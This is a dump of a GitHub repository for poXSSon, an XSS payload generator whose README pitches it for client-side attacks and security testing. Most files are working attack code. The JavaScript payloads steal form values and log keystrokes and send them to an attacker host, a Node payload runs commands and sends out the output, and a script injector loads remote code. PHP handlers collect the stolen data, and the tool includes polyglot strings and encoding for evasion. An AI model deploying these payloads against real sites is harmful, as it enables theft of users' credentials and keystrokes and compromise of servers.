├── LICENSE ├── README.md ├── lib └── handler.py ├── payloads ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-37.pyc │ ├── add_script.cpython-37.pyc │ ├── alert.cpython-37.pyc │ ├── cmd_exec.cpython-37.pyc │ ├── form_stealer.cpython-37.pyc │ ├── hide.cpython-37.pyc │ ├── img_replace.cpython-37.pyc │ ├── info.cpython-37.pyc │ ├── keylogger.cpython-37.pyc │ ├── link_replace.cpython-37.pyc │ ├── session_keylogger.cpython-37.pyc │ └── storage.cpython-37.pyc ├── add_script.py ├── alert.py ├── cmd_exec.py ├── form_stealer.py ├── hide.py ├── img_replace.py ├── info.py ├── keylogger.py ├── link_replace.py ├── random.py ├── random_confirm.py ├── session_keylogger.py ├── shortest.py └── storage.py ├── php_handler_dir ├── abc └── handler.php ├── poxsson-logo.svg ├── poxsson.py ├── random_confirm_payloads.txt ├── random_payloads.txt └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | ISC License 2 | 3 | Copyright (c) 2022 Red Code Labs 4 | 5 | Permission to use, copy, modify, and/or distribute this software for any 6 | purpose with or without fee is hereby granted, provided that the above 7 | copyright notice and this permission notice appear in all copies. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 10 | WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 11 | MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 12 | ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 13 | WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 14 | ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 15 | OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # poXSSon 2 | 3 |

4 | 5 |
6 | 7 | 8 |
9 |
10 | Create, encode and deploy complex JS payloads. 11 |
12 | 13 |

14 | 15 | 16 | ## What is this project? 17 | This tool gathers some of the most reliable and useful Javascript payloads that can be used in client-side attacks or while testing security posture of a web application. 18 | They can be adapted and modified to your specific needs. 19 | 20 | ## Installation 21 | All of the required deps can be easily installed via command: 22 | 23 | ```pip install -r requirements.txt``` 24 | 25 | ## Project details 26 | 27 | ### MultiplePayloads() 28 | Choose from several code templates to grab keystrokes, execute system commands and exfiltrate important data from target host. Save generated payload to a file or clipboard for further use. 29 | 30 | ### HighlyEVasive() 31 | Specify encoding schemes, custom script tags, format conversions and polyglot executors using intuitive command-line interface. 32 | 33 | ### FullyCustomizable() 34 | Msfvenom-like approach for specifying options enables you to quickly tweak any payload. Every aspect of the payload's logic can be modified, allowing unique behaviour depending on what system you target. 35 | 36 | ### RealTimeMonitoring() 37 | Most payloads come with a built-in PHP handler that can be launched after generating code template. It listens for status messages and data harvested by the launched payload. 38 | 39 | ### More info 40 | More info about poXSSon and it's usage can be found in our blogpost: [JS Payloads in 2021](https://redcodelabs.io/2021/11/28/js-payloads-in-2021.html). 41 | 42 | ## Contribute 43 | Contributions are always welcome! 44 | -------------------------------------------------------------------------------- /lib/handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | from http.server import HTTPServer, BaseHTTPRequestHandler 3 | 4 | class DefaultHandler(BaseHTTPRequestHandler): 5 | def do_GET(self): 6 | print(self.path) 7 | #self.send_response(200) 8 | #self.end_headers() 9 | #self.wfile.write(b'Hello, world!') 10 | 11 | def start_handler(port, log, outfile): 12 | httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler) 13 | httpd.serve_forever() 14 | -------------------------------------------------------------------------------- /payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__init__.py -------------------------------------------------------------------------------- /payloads/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/add_script.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/add_script.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/alert.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/alert.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/cmd_exec.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/cmd_exec.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/form_stealer.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/form_stealer.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/hide.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/hide.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/img_replace.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/img_replace.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/info.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/info.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/keylogger.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/keylogger.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/link_replace.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/link_replace.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/session_keylogger.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/session_keylogger.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/__pycache__/storage.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/redcode-labs/poXSSon/7046fac15e54e05a73d7d46a00916161d9f36cca/payloads/__pycache__/storage.cpython-37.pyc -------------------------------------------------------------------------------- /payloads/add_script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="add_script" 3 | description="Append external script to the top of the 'head' tag of the site as child element" 4 | options = [['URL', "URL of the external script", ""]] 5 | 6 | payload = """ 7 | 8 | var script=document.createElement('script'); 9 | script.type='text/javascript'; 10 | script.src='URL'; 11 | document.getElementsByTagName('head')[0].appendChild(script); 12 | 13 | """ 14 | -------------------------------------------------------------------------------- /payloads/alert.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="alert" 3 | description="Print alert message" 4 | options=[["MESSAGE", "Alert message to print", "alert!"]] 5 | payload = """ 6 | alert('MESSAGE') 7 | """ 8 | -------------------------------------------------------------------------------- /payloads/cmd_exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="cmd_exec" 11 | description="Executes command using NodeJS's execSync function" 12 | options = [["LHOST", "Host with listening handler", local_ip()], 13 | ["CMD", "Command to execute", "ls"]] 14 | handler_options = [["LOGFILE", "File to store logged data", "cmd_output.txt"]] 15 | payload = """ 16 | 17 | const execSync = require('child_process').execSync; 18 | const output = execSync('CMD', { encoding: 'utf-8' }); 19 | const executed_command = 'CMD'; 20 | new Image().src = "http://LHOST:8000/handler.php?output="+output+"?executed_command="+executed_command; 21 | """ 22 | 23 | handler = """ 24 | 29 | """ 30 | -------------------------------------------------------------------------------- /payloads/form_stealer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="form_stealer" 11 | description="Steals all the values set in forms and sends them away through an image src" 12 | options = [["LHOST", "Host to send captured strokes to", local_ip()]] 13 | handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]] 14 | 15 | payload = """ 16 | document.getElementsByTagName("body")[0].setAttribute("onunload","postData()"); 17 | 18 | function postData() { 19 | 20 | var output = "page="+document.location; 21 | var inputs, index; 22 | 23 | inputs = document.getElementsByTagName('input'); 24 | for (index = 0; index < inputs.length; ++index) { 25 | input_name = inputs[index].id || inputs[index].name; 26 | output = output + "&" + input_name + "=" + inputs[index].value; 27 | } 28 | 29 | output = encodeURI(output); 30 | new Image().src = "http://LHOST:8000/handler.php?"+output; 31 | 32 | }""" 33 | 34 | handler = """ 35 | $value){ 48 | if ($key == "page"){} else { 49 | $form_line = sprintf("\nName: %s Value: %s", $key, $value); 50 | } 51 | $f=fopen("LOGFILE","a+"); 52 | fwrite($f, $form_line); 53 | fclose($f); 54 | } 55 | ?> 56 | """ 57 | -------------------------------------------------------------------------------- /payloads/hide.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="hide" 3 | description="Hides specified element on the page" 4 | options = [['ELEMENT_ID', "ID of the element to hide", ""]] 5 | 6 | payload = """ 7 | var p = document.getElementById('ELEMENT_ID'); 8 | p.style.display = 'none'; 9 | 10 | """ 11 | -------------------------------------------------------------------------------- /payloads/img_replace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="img_replace" 3 | description="Replace all images on site with an image pointed to by URL" 4 | options = [["URL", "URL of the new image", ""]] 5 | 6 | payload = """ 7 | var imgs = document.getElementsByTagName("img"); 8 | for(var i=0, l=imgs.length; i 41 | """ 42 | -------------------------------------------------------------------------------- /payloads/link_replace.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | name="link_replace" 3 | description="Replaces all links on page" 4 | options = [['URL', "URL to replace the links with", "http://example.com"]] 5 | 6 | payload = """ 7 | Array.from(document.getElementsByTagName("a")).forEach(function(i) { 8 | i.href = "URL"; 9 | }); 10 | """ 11 | 12 | -------------------------------------------------------------------------------- /payloads/random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import random 3 | name="random" 4 | description="Chooses a random one-liner payload for blind testing backend's input validation" 5 | options = [[]] 6 | payload = random.choice(open('random_payloads.txt').readlines()) 7 | -------------------------------------------------------------------------------- /payloads/random_confirm.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import random 3 | name="random_confirm" 4 | description="Chooses a random one-liner 'confirm()' payload. An alternative to standard 'alert()'" 5 | options = [[]] 6 | payload = random.choice(open('random_confirm_payloads.txt').readlines()) 7 | -------------------------------------------------------------------------------- /payloads/session_keylogger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | import socket 3 | def local_ip(): 4 | try: 5 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 6 | s.connect(("8.8.8.8", 80)) 7 | return s.getsockname()[0] 8 | except: 9 | return "N/A" 10 | name="session_keylogger" 11 | description="A keylogger which follows user sessions thanks to an ID set into a cookie" 12 | options = [["LHOST", "Host to send captured strokes to", local_ip()], 13 | ["INTERVAL", "Number of seconds after which captured keystrokes are sent", "10"], 14 | ["TRACK_KEYS", "Track keystrokes", "true"], 15 | ["TRACK_MOUSE", "Track mouse movement", "false"], 16 | ["TRACK_CLICKS", "Track mouse clicks", "false"], 17 | ["COOKIE_NAME", "Name of the cookie shown in the browser", "cook"], 18 | ["COOKIE_LIFETIME", "Lifetime of cookie in days", "1"]] 19 | handler_options = [["LOGFILE", "File to store logged data", "session_klog.txt"]] 20 | 21 | payload = """ 22 | 23 | function Keylogger(){ 24 | //Bufers 25 | 26 | 27 | /* 28 | * Configuration of the keylogger 29 | ****** 30 | * track_keys : True if one wants to track the key pressed 31 | * track_mouse : True if one wants to track the movements of mouse 32 | * track_clicks : true if one wants to track the click 33 | * send_interval_s : interval to send the request to the server (in second) 34 | * distant_server : address of the server 35 | * cookie_name : Name of the cookie in the browser 36 | * cookie_lifetime : Lifetime of the cookie in days 37 | */ 38 | this.keylog_configuration={ 39 | track_keys: TRACK_KEYS, 40 | track_mouse: TRACK_MOUSE, 41 | track_clicks: TRACK_CLICKS, 42 | send_interval_s: INTERVAL, 43 | distant_server:'http://LHOST:8000/handler.php', 44 | cookie_name:'COOKIE_NAME', 45 | cookie_lifetime: COOKIE_LIFETIME 46 | }; 47 | /* 48 | * Function that generates a GUID (but not a strong one) 49 | */ 50 | this.S4=function() { 51 | return (((1+Math.random())*0x10000)|0).toString(16).substring(1); 52 | }; 53 | 54 | /* 55 | * Constructor-like function 56 | * Initialize elements to the right values 57 | */ 58 | this.begin=function(){ 59 | 60 | var guid_in_cookies; 61 | var i,x,y,ARRcookies=document.cookie.split(";"); 62 | for (i=0;i0){ 74 | this.guid=guid_in_cookies; 75 | } 76 | else{ 77 | /* Create the GUID */ 78 | this.guid= (this.S4()+this.S4()+"-"+this.S4()+"-"+ 79 | this.S4()+"-"+this.S4()+"-"+this.S4()+ 80 | this.S4()+this.S4()); 81 | 82 | /* Cookie setup*/ 83 | var exdate = new Date(); 84 | var exdays = this.keylog_configuration.cookie_lifetime; 85 | exdate.setDate(exdate.getDate() +exdays ); 86 | 87 | var c_value=escape(this.guid) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); 88 | document.cookie=this.keylog_configuration.cookie_name + "=" + c_value; 89 | } 90 | this.from_page=encodeURIComponent(window.location.href); 91 | this.transfer_buffer(); 92 | //alert("Method had been called" + this.property1); 93 | }; 94 | /* 95 | * Insert a key 96 | */ 97 | this.insert_key=function(event){ 98 | var new_char=''; 99 | if(event.altKey){ 100 | new_char = '{{Alt}}'; 101 | }else if(event.ctrlKey){ 102 | new_char = '{{Ctrl}}'; 103 | }else if(event.shiftKey){ 104 | new_char = '{{Shift}}'; 105 | } 106 | if(event.keyCode!=null){ 107 | if(event.keyCode){ 108 | new_char=new_char+this.decodeChar(event.keyCode); 109 | }else{ 110 | new_char=new_char+this.decodeChar(event.charCode); 111 | } 112 | } 113 | 114 | this.buffer_text_current=this.buffer_text_current+new_char; 115 | }; 116 | 117 | /* 118 | * Decode special characters. 119 | */ 120 | this.decodeChar=function(code){ 121 | var charac; 122 | switch(code){ 123 | case 8: 124 | charac='{{Backspace}}'; 125 | break; 126 | case 9: 127 | charac='{{Tab}}'; 128 | break; 129 | case 13: 130 | charac='{{Enter}}'; 131 | break; 132 | case 33: 133 | break; 134 | case 37: 135 | charac='{{<-}}'; 136 | break; 137 | case 38: 138 | charac='{{up}}'; 139 | break; 140 | case 39: 141 | charac='{{->}}'; 142 | break; 143 | case 40: 144 | charac='{{down}}'; 145 | break; 146 | case 46: 147 | charac='{{delete}}'; 148 | break; 149 | case 91: 150 | charac='{{leftWindow}}'; 151 | break; 152 | case 92: 153 | charac='{{rightWindow}}'; 154 | break; 155 | case 154: 156 | charac='{{PrtScreen}}'; 157 | break; 158 | default: 159 | charac=String.fromCharCode(code); 160 | break; 161 | } 162 | return charac; 163 | }; 164 | /* 165 | * 166 | */ 167 | this.insert_click=function(event){ 168 | // Nothing at the moment 169 | }; 170 | /* 171 | * 172 | */ 173 | this.send_infos=function(){ 174 | var parameters='?frompage='+this.from_page; 175 | parameters =parameters + '&guid='+this.guid; 176 | parameters = parameters + '&text='+encodeURIComponent(this.buffer_text_to_send); 177 | var address_to_call=this.keylog_configuration.distant_server+parameters; 178 | //We just preload the image without actually inserting it 179 | image01= new Image(); 180 | image01.src=address_to_call; 181 | }; 182 | /* 183 | * Swap values 184 | */ 185 | this.transfer_buffer=function(){ 186 | this.buffer_text_to_send=this.buffer_text_current; 187 | this.buffer_text_current=''; 188 | this.send_infos(); 189 | 190 | var t = setTimeout('logger.transfer_buffer()',this.keylog_configuration.send_interval_s*1000); 191 | }; 192 | 193 | 194 | this.buffer_text_current='[Begin session]', 195 | this.buffer_text_to_send='', 196 | //Important information 197 | this.guid='UNDEFINED', 198 | this.from_page='UNDEFINED'; 199 | 200 | 201 | } 202 | var logger = new Keylogger(); 203 | /* 204 | * Launch the logger 205 | */ 206 | function launch(){ 207 | logger.begin(); 208 | //binding for key pressed 209 | if(logger.keylog_configuration.track_keys){ 210 | if (navigator.appName == 'Microsoft Internet Explorer') 211 | { 212 | document.body.attachEvent('onkeypress',process_key); 213 | }else{ 214 | //Binding for everything but ie 215 | document.addEventListener('keypress',process_key,false); 216 | 217 | //document.body.setAttribute('onKeyPress','Keylogger.insert_key(event)'); 218 | } 219 | } 220 | //Binding for click 221 | if(logger.keylog_configuration.track_clicks){ 222 | //Binding for everything but ie 223 | //document.body.setAttribute('onclick','Keylogger.insert_click(event)'); 224 | } 225 | } 226 | 227 | function process_key(event){ 228 | logger.insert_key(event); 229 | }""" 230 | 231 | handler = """ 232 | 233 | 248 | 249 | """ 269 | -------------------------------------------------------------------------------- /payloads/shortest.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | name="shortest" 3 | description="The shortest payload for XSS injection" 4 | payload = """", 30 | "2" : "\"'-->", 31 | "3" : "'\"-->", 32 | "4" : "\"'>-->*/" , 33 | "5" : "\"'-->", 34 | "6" : """%%0ajavascript:`/*\\"/*--><svg onload='/*`""" 35 | } 36 | 37 | 38 | #Obtains local IP for use with handler 39 | def local_ip(): 40 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 41 | s.connect(("8.8.8.8", 80)) 42 | return s.getsockname()[0] 43 | 44 | def print_banner(): 45 | print("") 46 | print("") 47 | print(green("{_______ {__ {__ {__ __ {__ __")) 48 | print(green("{__ {__ {__ {__ {__ {__{__ {__ ")) 49 | print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ ")) 50 | print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__")) 51 | print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__")) 52 | print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__")) 53 | print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ ")) 54 | print("") 55 | 56 | #Function for printing metasploit-like tables ;> 57 | def print_table(table_data): 58 | styles = [] 59 | for title in table_data[0]: 60 | msf_style = "-"*len(title) 61 | styles.append(msf_style) 62 | table_data.insert(1, styles) 63 | table_instance = SingleTable(table_data) 64 | table_instance.inner_heading_row_border = False 65 | table_instance.inner_row_border = False 66 | table_instance.inner_column_border = False 67 | table_instance.outer_border = False 68 | table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'} 69 | print(table_instance.table) 70 | print('') 71 | 72 | #Simply lists files under /payloads dir and prints info about them in color 73 | def list_payloads(): 74 | #print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}") 75 | table_data = [["Name", "Description", "Handler", "Length"]] 76 | payloads = [] 77 | plds = [] 78 | for p in os.walk(POXSSON_PATH+'payloads'): 79 | payloads.append(p) 80 | payloads = payloads[0][2] 81 | for p in payloads: 82 | if ('init' in p or '.pyc' in p): 83 | pass #We don't want temporary files to interfere 84 | else: 85 | if ('.py' in p and not '.pyc' in p): 86 | plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module 87 | for pl in plds: 88 | try: 89 | handler = pl.handler 90 | handler = True 91 | except: 92 | handler = False 93 | table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)]) 94 | print(info(f"Available payloads: {len(plds)}")) 95 | print("") 96 | print_table(table_data) 97 | print("") 98 | polyglot_triggers_data = polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"]) 99 | print(info(f"Available triggers: {len(polyglot_triggers)}")) 100 | print("") 101 | print_table(polyglot_triggers) 102 | print("") 103 | print(good(f"Available polyglots: {len(polyglots)}")) 104 | for idn in polyglots: 105 | print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}") 106 | print("") 107 | 108 | #Shows info (options, description, size...) about payload selected with "--payload" flag 109 | def print_payload_info(payload_mod): 110 | payload_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']] 111 | handler_options_table_data = [['NAME', 'DESCRIPTION', 'VALUE']] 112 | try: 113 | handler = payload_mod.handler 114 | handler = True 115 | except: 116 | handler = False 117 | try: 118 | for opt in payload_mod.options: #Extracts several information from multi-dimensional .options list 119 | option = opt[0] 120 | value = opt[1] 121 | description = opt[2] 122 | payload_options_table_data.append([option, value, description]) 123 | except: 124 | pass 125 | try: 126 | for opt in payload_mod.handler_options: 127 | option = opt[0] 128 | value = opt[1] 129 | description = opt[2] 130 | handler_options_table_data.append([option, value, description]) 131 | except: 132 | pass 133 | #Prints all obtained data with f"" prefix formatting 134 | print(info(f"Name: {payload_mod.name}")) 135 | print(info(f"Description: {payload_mod.description}")) 136 | print(info(f"Length: {len(payload_mod.payload)} bytes")) 137 | print(info(f"Handler: {handler}")) 138 | if len(payload_options_table_data) > 1: 139 | print("") 140 | info("Payload options:") 141 | print("") 142 | print_table(payload_options_table_data) 143 | if len(handler_options_table_data) > 1: 144 | print("") 145 | info("Handler options:") 146 | print("") 147 | print_table(handler_options_table_data) 148 | 149 | #def test_payload(payload_name): 150 | # pass 151 | 152 | #I was so high writing this function lol 153 | #But I suppose it just copies a PHP handler to a directory (?) 154 | #And launches it from there using PHP inline interpreter 155 | def start_php_handler(php_code): 156 | #subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True) 157 | with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file: 158 | handler_file.write(php_code) 159 | handler_file.close() 160 | subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True) 161 | subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True) 162 | 163 | #Inserts default options, and also options passed as NAME=VAL in command line 164 | def insert_options(payload_code, payload_options, cli_options): 165 | pc = payload_code 166 | for option in cli_options: 167 | name = option.split("=")[0].upper() 168 | value = option.split("=")[1] 169 | pc = pc.replace(name.upper(), value) 170 | for option in payload_options: 171 | name = option[0] 172 | value = option[2] 173 | if (value == "" and "=" in ''.join(cli_options)): 174 | print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something 175 | #if name.upper() not in payload_code: 176 | #logs.err("No such option") 177 | #sys.exit() 178 | if name.lower() not in ''.join(cli_options): 179 | pc = pc.replace(name.upper(), value) 180 | #try: 181 | #except: 182 | return pc 183 | 184 | 185 | def arguments(): 186 | parser = argparse.ArgumentParser(prog="poxsson") 187 | wrapping = parser.add_argument_group() 188 | #wrapping_group = wrapping.add_mutually_exclusive_group() 189 | parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs means that 0 or mor arguments of this type can be passed 190 | parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads') 191 | parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='', help='Specify the payload') 192 | parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity') 193 | parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info') 194 | parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion') 195 | parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard') 196 | parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='', help='Save payload to a file') 197 | parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='', help='Execute payload after specific period of time (seconds, minutes, hours)') 198 | parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='', help='Encode payload') 199 | parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='', help="Use specific (or random) separator between tag and first parameter") 200 | #Separate group for executable wrappers (it just looks more clear imho) 201 | wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload") 202 | wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic 16 | 17 | 18 | 19 | 20 | 88 | 91 | 92 | click 93 | 94 | 101 | 102 | 103 | 106 | --!> 111 | 112 |
x 113 | "> 114 |